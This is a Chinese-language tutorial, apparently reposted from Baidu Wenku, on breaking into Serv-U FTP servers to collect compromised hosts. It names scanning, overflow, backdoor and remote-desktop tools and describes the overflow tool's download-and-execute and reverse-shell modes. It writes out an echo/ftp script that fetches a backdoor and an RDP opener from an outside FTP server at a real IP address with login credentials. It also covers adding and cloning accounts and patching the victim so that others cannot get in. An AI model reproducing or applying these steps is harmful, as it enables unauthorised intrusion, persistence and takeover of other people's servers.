serv-u远程溢出

来源:百度文库 编辑:神马文学网 时间:2024/03/29 18:47:43
通过serv-u漏洞入侵全过程
======================================================================
serv-u漏洞已经发布了好长一段时间了,不过好多菜鸟朋友还没有能够掌握,而且
现在通过这个漏洞还能找很多肉鸡的,现在我就通过演示给广大的菜鸟朋友看一下
怎么来得到权限、放置后门、打补丁的!
serv-u服务器的配置都不错的哦!
=======================================================================
所需要的工具:ftpscan.exe,hotmail的ftp密码帐号扫描工具,
killftp.exe,ftp漏洞溢出程序
wineggdrop, 后门工具
3389.exe,开3389的工具
还有补丁程序,jay的,大家可以看帖子:
http://jdwl.net.cn/qfaq/forum_view.asp?forum_id=5&view_id=2875
其他程序大家可以去清风上去下载!
=======================================================================
需要的操作系统:98、2000、xp、2003下都可以成功溢出,还有大家最好找一个
ftp空间,你可以用自己的肉鸡做,也可以去找一些免费的空间,这个不在本教程
的讨论范围之内!
=======================================================================
现在我们先来扫一些ftp帐号,可写不可写的都可以,我们看看ftpscan的使用方法
FTPSCAN.EXE StartIP EndIP Port Threads [FileName]
ftpscan 开始ip 结束ip ftp端口(一般用21) 线程(看你的机器配置而定) 保存的文件名
好了,我们先让他扫着,下面我们来配置我们的后门程序,我这里用wineggdrop
做演示,详细的配置操作请看作者的说明文件!
后门程序有加壳和未加壳版本,未加壳的版本大家可以自己加下壳,我这里为了
演示的方便就用加过壳的,未加壳的版本要先加壳后配置!
好了我们配置好了,下面我们来制作成自解压文件,为了方便我们的使用!
下面我们把我们所需要的工具上传到我们的ftp空间上!
=======================================================================
好了,现在我们登陆肉鸡来看看扫描结果,OK,找到了几个,我们来溢出看看
在溢出之前我们先来看看killftp的使用方法!
Usage: killftp
killftp
killftp
第一个是直接溢出,也是我们经常要使用的方法,第二个是要下载文件后门程序
并执行,第三个是用反弹端口的方法,你要先用nc监听一个端口,这个在有防火墙
的时候特别有用!
我们来看看!
=======================================================================
好了成功的溢出一台了,我们加帐号先,
0K,我们来上传我们的工具!
echo open 61.187.190.170 >ftp.txt
echo ceshi  >>ftp.txt
echo tongtu  >>ftp.txt
echo binary  >>ftp.txt   [可选]
echo get 3389.exe  >>ftp.txt
echo get 2.exe  >>ftp.txt
echo bye  >>ftp.txt
ftp -s:ftp.txt
delftp.txt
这样我们就成功的上传了我们的工具,一个是我们的后门程序,一个是开3389的
那位说了wineggdrop也能开终端,为什么还要用3389.exe开呢?呵呵,这个是
个人习惯而已!
OK,看看我的操作!
======================================================================
好了,我们已经成功的给他开了终端和放置了后门,现在我们要上去给他打上补丁
顺便给他克隆一个帐号!
等待服务器的重起中!。。。。。。。。。。。。。。。。。。。。。。。。。
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
服务器重起还是比较慢的!耐心的等待!
用wineggdrop开终端是不需要重起的哦!我们已经进来了!
这个就是我们的补丁程序,我们先用ftp上传上去
=======================================================================
怎么样,现在这个肉鸡基本上就是你的了,是不是有些成功的喜悦呢?呵呵!
附件:serv-u.rar